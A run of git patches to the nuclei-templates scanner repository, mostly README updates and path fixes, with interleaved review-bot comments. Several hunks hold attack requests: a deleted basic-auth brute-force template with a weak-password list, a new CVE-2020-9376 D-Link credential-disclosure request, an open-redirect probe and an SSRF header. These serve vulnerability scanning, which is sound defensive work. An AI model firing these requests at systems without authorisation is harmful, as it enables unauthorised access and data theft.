540da369d054f40edd39f7d79d1081e6682fef9e Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Mon, 11 Jan 2021 09:17:15 +0000 Subject: [PATCH 48/85] Auto Update README [Mon Jan 11 09:17:15 UTC 2021] :robot: --- README.md | 25 ++++++++++++++++++++----- 1 file changed, 20 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 5b4b264cbb..0dfbc1a18c 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. ### Nuclei templates `v7.3.7` overview +------ | Templates | Counts | Templates | Counts | | --------------- | ------------------------------- | ---------------- | ------------------------------ | @@ -25,6 +26,7 @@ An overview of the nuclei template directory including number of templates and H ### Nuclei templates `v7.3.7` tree overview +-----
Nuclei templates @@ -566,11 +568,24 @@ An overview of the nuclei template directory including number of templates and H **53 directories, 477 files**. -Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. +📖 Documentation +----- + +Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding. + +💪 Contributions +----- + +Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. + +👨‍💻 Community +----- + +You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. + +💡 Notes +----- +- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. ------- -**Notes:** -1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests. -2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests. Thanks again for your contribution and keeping the community vibrant. :heart: From 3c90d959d5fee8aefd8f76d3d284a4bb35ff3c5d Mon Sep 17 00:00:00 2001 
From: Zhenya Savushkin Date: Mon, 11 Jan 2021 11:45:51 +0200 Subject: [PATCH 49/85] fix grafana subtemplate location --- workflows/grafana-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml index 92d69b997f..7438d10b96 100644 --- a/workflows/grafana-workflow.yaml +++ b/workflows/grafana-workflow.yaml @@ -13,4 +13,4 @@ workflows: - template: exposed-panels/grafana-detect.yaml subtemplates: - - template: default-logins/grafana-default-credential.yaml \ No newline at end of file + - template: default-logins/grafana/grafana-default-credential.yaml From 891c3d373610058b5a02b0818a208e55e0fb9f97 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 15:18:37 +0530 Subject: [PATCH 50/85] path updates --- workflows/rabbitmq-workflow.yaml | 2 +- workflows/solarwinds-orion-workflow.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index 349ce0f23b..4a606cd24c 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml @@ -13,4 +13,4 @@ workflows: - template: exposed-panels/rabbitmq-dashboard.yaml subtemplates: - - template: default-logins/rabbitmq-default-admin.yaml \ No newline at end of file + - template: default-logins/rabbitmq/rabbitmq-default-admin.yaml \ No newline at end of file diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml index 654c9f341e..980148284e 100644 --- a/workflows/solarwinds-orion-workflow.yaml +++ b/workflows/solarwinds-orion-workflow.yaml 
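Review bot: The replacement line in rabbitmq-workflow.yaml still carries `\ No newline at end of file`, and the solarwinds-orion-workflow.yaml hunk in the same patch does the same, whereas the grafana-workflow.yaml fix just above takes the opportunity to terminate the file with a newline. All three are one-line path updates to the last line of a file, so ending the line with a newline here as well keeps the workflow files consistent and avoids a noisy two-line diff the next time that path changes.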
@@ -13,4 +13,4 @@ workflows: subtemplates: - template: cves/2018/CVE-2018-19386.yaml - template: cves/2020/CVE-2020-10148.yaml - - template: default-logins/solarwinds-default-admin.yaml \ No newline at end of file + - template: default-logins/solarwinds/solarwinds-default-admin.yaml \ No newline at end of file From 29803150301fa2217c5ef325e67269672aad0603 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 15:25:10 +0530 Subject: [PATCH 51/85] moving basic-auth-bruteforce to another branch as it requires more work --- fuzzing/basic-auth-bruteforce.yaml | 98 ------------------------------ 1 file changed, 98 deletions(-) delete mode 100644 fuzzing/basic-auth-bruteforce.yaml diff --git a/fuzzing/basic-auth-bruteforce.yaml b/fuzzing/basic-auth-bruteforce.yaml deleted file mode 100644 index 3ec202210b..0000000000 --- a/fuzzing/basic-auth-bruteforce.yaml +++ /dev/null 
@@ -1,98 +0,0 @@ -id: basic-auth-bruteforce - -info: - name: Basic Auth Bruteforce - author: w4cky_ - severity: high - - # Impotent Notes:- - # This is specific template to work with basic 401 authentication endpoint. - # Do not run this template on non basic authentication related endpoints to avoid false positive results. - -requests: - - - payloads: - username: - - admin - - manager - - administrator - - username - - login - - anonymous - - test - - guest - - root - - demo - - password: - - admin - - pass1 - - pass1 - - root - - welcome - - p@ssw0rd - - user - - test - - testest - - dupa8 - - admin123 - - admin1234 - - admin12345 - - anonymous - - manager - - linux - - system - - oracle - - administrator - - 11111111 - - qwerty123 - - cisco123 - - admin123456 - - 1qazXSW@ - - master - - 123qweasd - - 1qaz2wsx - - 123456789 - - 1234567890 - - !qaz@wsx - - !q@w - - wubao - - pa55w0rd - - 123abc - - 123456 - - 123456789 - - qwerty - - password - - 1111111 - - 12345678 - - abc123 - - 1234567 - - password1 - - 12345 - - 1234567890 - - 123123 - - 000000 - - Iloveyou - - 1234 - - 1q2w3e4r5t - - Qwertyuiop - - 123 - - Monkey - - Dragon - - demo - - attack: clusterbomb - - raw: - - | - GET /protected HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 - Accept-Language: en-US,en;q=0.9 - Connection: close - - matchers: - - type: status - status: - - 200 \ No newline at end of file From afee90df5be527b19184d9c1d36dc88cb1480cad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Jan 2021 09:55:51 +0000 Subject: [PATCH 52/85] Auto Update README [Mon Jan 11 09:55:51 UTC 2021] :robot: --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 0dfbc1a18c..83b117d3e9 100644 --- a/README.md +++ b/README.md 
@@ -19,7 +19,7 @@ An overview of the nuclei template directory including number of templates and H | cves | 154 | default-logins | 8 | | dns | 6 | exposed-panels | 72 | | exposed-tokens | 9 | exposures | 41 | -| fuzzing | 6 | helpers | 3 | +| fuzzing | 5 | helpers | 3 | | miscellaneous | 14 | misconfiguration | 37 | | takeovers | 1 | technologies | 44 | | vulnerabilities | 62 | workflows | 17 | @@ -358,7 +358,6 @@ An overview of the nuclei template directory including number of templates and H │   └── trace-axd-detect.yaml ├── fuzzing │   ├── arbitrary-file-read.yaml -│   ├── basic-auth-bruteforce.yaml │   ├── directory-traversal.yaml │   ├── generic-lfi-fuzzing.yaml │   ├── iis-shortname.yaml @@ -566,7 +565,7 @@ An overview of the nuclei template directory including number of templates and H
-**53 directories, 477 files**. +**53 directories, 476 files**. 📖 Documentation ----- From 389477dd283da20ff4d827cbd71881215699d8cb Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Tue, 12 Jan 2021 11:47:44 +0530 Subject: [PATCH 53/85] removing duplicate template --- exposures/configs/exposed-alps-spring.yaml | 30 ---------------------- 1 file changed, 30 deletions(-) delete mode 100644 exposures/configs/exposed-alps-spring.yaml diff --git a/exposures/configs/exposed-alps-spring.yaml b/exposures/configs/exposed-alps-spring.yaml deleted file mode 100644 index dea715883a..0000000000 --- a/exposures/configs/exposed-alps-spring.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: exposed-alps-spring - -info: - name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) - author: dwisiswant0 - severity: medium - reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ - -requests: - - method: GET - path: - - "{{BaseURL}}/profile" - - "{{BaseURL}}/api/profile" - - "{{BaseURL}}/alps/profile" - matchers-condition: and - matchers: - - type: word - words: - - "_links" - - "/alps/" - - "profile" - condition: and - part: body - - type: word - words: - - "application/hal+json" - part: header - - type: status - status: - - 200 \ No newline at end of file From 77ae542dd15093e94ca15007e0920157528bc724 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Jan 2021 06:24:23 +0000 Subject: [PATCH 54/85] Auto Update README [Tue Jan 12 06:24:23 UTC 2021] :robot: --- README.md | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 83b117d3e9..81defd02aa 100644 --- a/README.md +++ b/README.md 
@@ -11,21 +11,21 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. -### Nuclei templates `v7.3.7` overview +### Nuclei templates `v7.3.8` overview ------ | Templates | Counts | Templates | Counts | | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 154 | default-logins | 8 | | dns | 6 | exposed-panels | 72 | -| exposed-tokens | 9 | exposures | 41 | +| exposed-tokens | 9 | exposures | 40 | | fuzzing | 5 | helpers | 3 | | miscellaneous | 14 | misconfiguration | 37 | | takeovers | 1 | technologies | 44 | | vulnerabilities | 62 | workflows | 17 | -### Nuclei templates `v7.3.7` tree overview +### Nuclei templates `v7.3.8` tree overview -----
@@ -322,7 +322,6 @@ An overview of the nuclei template directory including number of templates and H │   │   ├── amazon-docker-config-disclosure.yaml │   │   ├── ansible-config-disclosure.yaml │   │   ├── composer-config.yaml -│   │   ├── exposed-alps-spring.yaml │   │   ├── exposed-svn.yaml │   │   ├── git-config-nginxoffbyslash.yaml │   │   ├── git-config.yaml @@ -565,7 +564,7 @@ An overview of the nuclei template directory including number of templates and H
-**53 directories, 476 files**. +**53 directories, 475 files**. 📖 Documentation ----- From 33bc9f554a128c95e32d52e48a421fdb7aa275b1 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Tue, 12 Jan 2021 13:27:56 +0530 Subject: [PATCH 55/85] readme updates --- .github/scripts/README.tmpl | 26 +++++++++++++++++++++----- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 4d10939eda..bf8219ee55 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -9,10 +9,22 @@ f""" Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list. -An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. +# Resources -### Nuclei templates `{version}` overview ------- +- [Templates](#nuclei-templates-overview) +- [Documentation](#-documentation) +- [Contributions](#-contributions) +- [Discussion](#-discussion) +- [Community](#-community) +- [Notes](#-notes) + +### Nuclei templates overview +----- + +An overview of the nuclei template directory including number of templates associated with each directory. + + +**Directory structure of nuclei templates:** | Templates | Counts | Templates | Counts | | --------------- | ------------------------------- | ---------------- | ------------------------------ | 
@@ -25,8 +37,7 @@ An overview of the nuclei template directory including number of templates and H | vulnerabilities | {countTpl("vulnerabilities/*")} | workflows | {countTpl("workflows")} | -### Nuclei templates `{version}` tree overview ------ +**Tree structure of nuclei templates:**
Nuclei templates @@ -49,6 +60,11 @@ Please navigate to https://nuclei.projectdiscovery.io for detailed documentation Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +💬 Discussion +----- + +Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. + 👨‍💻 Community ----- From 4001d8f9677da5db7b5740ee1468b9fa54a13321 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Jan 2021 07:58:38 +0000 Subject: [PATCH 56/85] Auto Update README [Tue Jan 12 07:58:38 UTC 2021] :robot: --- README.md | 26 +++++++++++++++++++++----- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 81defd02aa..27571ae44f 100644 --- a/README.md +++ b/README.md 
@@ -9,10 +9,22 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list. -An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. +# Resources -### Nuclei templates `v7.3.8` overview ------- +- [Templates](#nuclei-templates-overview) +- [Documentation](#-documentation) +- [Contributions](#-contributions) +- [Discussion](#-discussion) +- [Community](#-community) +- [Notes](#-notes) + +### Nuclei templates overview +----- + +An overview of the nuclei template directory including number of templates associated with each directory. + + +**Directory structure of nuclei templates:** | Templates | Counts | Templates | Counts | | --------------- | ------------------------------- | ---------------- | ------------------------------ | @@ -25,8 +37,7 @@ An overview of the nuclei template directory including number of templates and H | vulnerabilities | 62 | workflows | 17 | -### Nuclei templates `v7.3.8` tree overview ------ +**Tree structure of nuclei templates:**
Nuclei templates @@ -576,6 +587,11 @@ Please navigate to https://nuclei.projectdiscovery.io for detailed documentation Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +💬 Discussion +----- + +Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. + 👨‍💻 Community ----- From d8fc0079d96829b0759a19e791ee4b03bba4e5b0 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Tue, 12 Jan 2021 21:45:12 +0530 Subject: [PATCH 57/85] Adding CVE-2020-9376 --- cves/2020/CVE-2020-9376.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-9376.yaml diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml new file mode 100644 index 0000000000..7d671b3333 --- /dev/null +++ b/cves/2020/CVE-2020-9376.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2020-9376 + +info: + name: D-Link Information Disclosure via getcfg.php + author: whynotke + severity: high + description: | + D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. + NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + + References: + - https://nvd.nist.gov/vuln/detail/CVE-2020-9376 + +requests: + - method: POST + path: + - "{{BaseURL}}/getcfg.php" + + body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Admin" + - "" + - "" + condition: and + part: body From e4018823919b2d487d229a379d9e8e97b9e054ad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Jan 2021 16:16:29 +0000 Subject: [PATCH 58/85] Auto Update README [Tue Jan 12 16:16:29 UTC 2021] :robot: --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 27571ae44f..97ea5862df 100644 --- a/README.md +++ b/README.md @@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 154 | default-logins | 8 | +| cves | 155 | default-logins | 8 | | dns | 6 | exposed-panels | 72 | | exposed-tokens | 9 | exposures | 40 | | fuzzing | 5 | helpers | 3 | @@ -205,6 +205,7 @@ An overview of the nuclei template directory including number of templates assoc │   ├── CVE-2020-8982.yaml │   ├── CVE-2020-9047.yaml │   ├── CVE-2020-9344.yaml +│   ├── CVE-2020-9376.yaml │   ├── CVE-2020-9484.yaml │   ├── CVE-2020-9496.yaml │   └── CVE-2020-9757.yaml @@ -575,7 +576,7 @@ An overview of the nuclei template directory including number of templates assoc
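Review bot: The word matcher closing this hunk combines `"Admin"` with two entries that render here as empty strings (`- ""`), and an empty word is contained in every response body, so under `condition: and` the matcher collapses to a bare check for `Admin` on a 200 from getcfg.php, which is a weak signal for a high-severity finding. If those two entries are real markup that the rendering stripped the point is moot; if not, replace them with fragments that only the disclosed configuration block contains so the `and` condition actually narrows the match. Separately, as the collapsed rendering shows it, `References:` and the NVD URL sit inside the `description: |` block scalar rather than in a `reference:` key, so tooling that reads `info.reference` will not see the link; move it to `reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9376` under `info`.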
-**53 directories, 475 files**. +**53 directories, 476 files**. 📖 Documentation ----- From b5159893d00663359dcd49a184af5cb2ad2b955f Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Wed, 13 Jan 2021 12:40:31 +0530 Subject: [PATCH 59/85] removing duplicate template --- vulnerabilities/thinkific-redirect.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 vulnerabilities/thinkific-redirect.yaml diff --git a/vulnerabilities/thinkific-redirect.yaml b/vulnerabilities/thinkific-redirect.yaml deleted file mode 100644 index 17873bceb3..0000000000 --- a/vulnerabilities/thinkific-redirect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: thinkific-redirect - -info: - name: Thinkific Open URL Redirect - author: Gal Nagli - severity: low - -requests: - - method: GET - - path: - - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://example.com" - - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - words: - - " Date: Wed, 13 Jan 2021 07:11:04 +0000 Subject: [PATCH 60/85] Auto Update README [Wed Jan 13 07:11:04 UTC 2021] :robot: --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 97ea5862df..580eeeaad4 100644 --- a/README.md +++ b/README.md @@ -534,7 +534,6 @@ An overview of the nuclei template directory including number of templates assoc │   ├── springboot │   │   ├── springboot-actuators-jolokia-xxe.yaml │   │   └── springboot-h2-db-rce.yaml -│   ├── thinkific-redirect.yaml │   ├── vmware │   │   ├── vmware-vcenter-lfi-linux.yaml │   │   └── vmware-vcenter-lfi.yaml @@ -576,7 +575,7 @@ An overview of the nuclei template directory including number of templates assoc
-**53 directories, 476 files**. +**53 directories, 475 files**. 📖 Documentation ----- From 106da77fc3aec9f29f0c157bca64d007fda17ee2 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Wed, 13 Jan 2021 13:01:46 +0530 Subject: [PATCH 61/85] Preparing for request clustering --- cves/2014/CVE-2014-6271.yaml | 2 +- cves/2020/CVE-2020-16952.yaml | 2 +- exposed-panels/kubernetes-dashboard.yaml | 2 +- exposed-panels/webmin-panel.yaml | 2 +- exposed-panels/zipkin-exposure.yaml | 2 +- exposed-tokens/generic/http-username-password.yaml | 2 +- exposures/apis/wadl-api.yaml | 2 +- miscellaneous/dir-listing.yaml | 2 +- miscellaneous/trace-method.yaml | 4 ++-- misconfiguration/linkerd-ssrf-detect.yaml | 2 +- misconfiguration/php-errors.yaml | 2 +- takeovers/subdomain-takeover.yaml | 2 +- technologies/basic-auth-detection.yaml | 2 +- technologies/cacti-detect.yaml | 2 +- technologies/google-storage.yaml | 2 +- technologies/home-assistant.yaml | 2 +- technologies/kong-detect.yaml | 2 +- technologies/linkerd-badrule-detect.yaml | 2 +- technologies/mrtg-detect.yaml | 2 +- technologies/prometheus-exporter-detect.yaml | 2 +- technologies/tech-detect.yaml | 2 +- vulnerabilities/other/pdf-signer-ssti-to-rce.yaml | 2 +- 22 files changed, 23 insertions(+), 23 deletions(-) diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 6290a01997..0719fd28a2 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/cgi-bin/status" - "{{BaseURL}}/cgi-bin/stats" - "{{BaseURL}}/cgi-bin/test" diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml index 64051855aa..11be22a053 100644 --- a/cves/2020/CVE-2020-16952.yaml +++ b/cves/2020/CVE-2020-16952.yaml @@ -15,7 +15,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: - type: regex 
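Review bot: Rewriting the first path entry from `{{BaseURL}}/` to `{{BaseURL}}` in CVE-2014-6271 (and identically in CVE-2020-16952 here and in the hunks on the following lines through pdf-signer-ssti-to-rce) is only a no-op when BaseURL is a bare scheme://host[:port]; for a target supplied with a path component (`https://host/app`) the two forms request different resources, and the slash-less one is commonly answered with a redirect to the slash form rather than the page the matchers inspect. Templates that set `redirects: true` (webmin-panel, tech-detect) should be unaffected, but the ones that do not (kubernetes-dashboard, dir-listing, php-errors, basic-auth-detection, kong-detect and the others in this commit) may stop matching for such targets. If request clustering requires the normalised form, a one-line note in the commit message or in the contributing guide would keep the next reviewer from reverting it as a typo.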
diff --git a/exposed-panels/kubernetes-dashboard.yaml b/exposed-panels/kubernetes-dashboard.yaml index 341bd3be10..1aa0892365 100644 --- a/exposed-panels/kubernetes-dashboard.yaml +++ b/exposed-panels/kubernetes-dashboard.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers: - type: word words: diff --git a/exposed-panels/webmin-panel.yaml b/exposed-panels/webmin-panel.yaml index ef6329dbed..7787b28d95 100644 --- a/exposed-panels/webmin-panel.yaml +++ b/exposed-panels/webmin-panel.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/webmin/" redirects: true matchers: diff --git a/exposed-panels/zipkin-exposure.yaml b/exposed-panels/zipkin-exposure.yaml index c8b60f1cfa..2ab6e07ca9 100755 --- a/exposed-panels/zipkin-exposure.yaml +++ b/exposed-panels/zipkin-exposure.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/zipkin/" matchers: - type: word diff --git a/exposed-tokens/generic/http-username-password.yaml b/exposed-tokens/generic/http-username-password.yaml index 774dfb8497..34eec3fe1b 100644 --- a/exposed-tokens/generic/http-username-password.yaml +++ b/exposed-tokens/generic/http-username-password.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" extractors: - type: regex diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index 83f800b6e1..adf4433d25 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -28,7 +28,7 @@ requests: part: body - method: OPTIONS path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" matchers: diff --git a/miscellaneous/dir-listing.yaml b/miscellaneous/dir-listing.yaml index e5ce749e94..929ab3ed09 100644 --- a/miscellaneous/dir-listing.yaml +++ b/miscellaneous/dir-listing.yaml 
@@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers: - type: word words: diff --git a/miscellaneous/trace-method.yaml b/miscellaneous/trace-method.yaml index df1551e755..8f3069921e 100644 --- a/miscellaneous/trace-method.yaml +++ b/miscellaneous/trace-method.yaml @@ -11,7 +11,7 @@ info: requests: - method: TRACE path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers: - type: word @@ -22,7 +22,7 @@ requests: - method: OPTIONS path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers: - type: regex diff --git a/misconfiguration/linkerd-ssrf-detect.yaml b/misconfiguration/linkerd-ssrf-detect.yaml index ad99f869a7..a1d3c16688 100644 --- a/misconfiguration/linkerd-ssrf-detect.yaml +++ b/misconfiguration/linkerd-ssrf-detect.yaml @@ -23,7 +23,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" headers: l5d-dtab: /svc/* => /$/inet/example.com/443 diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index 358e2d1bd4..d1682fe207 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers: - type: word diff --git a/takeovers/subdomain-takeover.yaml b/takeovers/subdomain-takeover.yaml index 4db0bfe0ed..1c5981edcc 100644 --- a/takeovers/subdomain-takeover.yaml +++ b/takeovers/subdomain-takeover.yaml @@ -15,7 +15,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: or matchers: diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml index d35a93e7a9..e784861b13 100644 --- a/technologies/basic-auth-detection.yaml +++ b/technologies/basic-auth-detection.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index b9c1e8cc78..0a2a721928 100644 
--- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/cacti/" matchers-condition: and diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml index 204b69786f..27f4814a5b 100644 --- a/technologies/google-storage.yaml +++ b/technologies/google-storage.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers: - type: word words: diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml index abe3683d06..9b4a19b866 100644 --- a/technologies/home-assistant.yaml +++ b/technologies/home-assistant.yaml @@ -9,7 +9,7 @@ requests: - method: GET path: - "{{BaseURL}}:8123/" - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers: - type: word words: diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index e851215f65..4807a5f322 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml index 6852861ffe..5e445af239 100644 --- a/technologies/linkerd-badrule-detect.yaml +++ b/technologies/linkerd-badrule-detect.yaml @@ -14,7 +14,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" headers: l5d-dtab: /svc/* diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml index 39bff6298d..19a062f6fa 100644 --- a/technologies/mrtg-detect.yaml +++ b/technologies/mrtg-detect.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/mrtg/" - "{{BaseURL}}/MRTG/" diff --git a/technologies/prometheus-exporter-detect.yaml b/technologies/prometheus-exporter-detect.yaml index a2386b2067..62746091f9 100644 
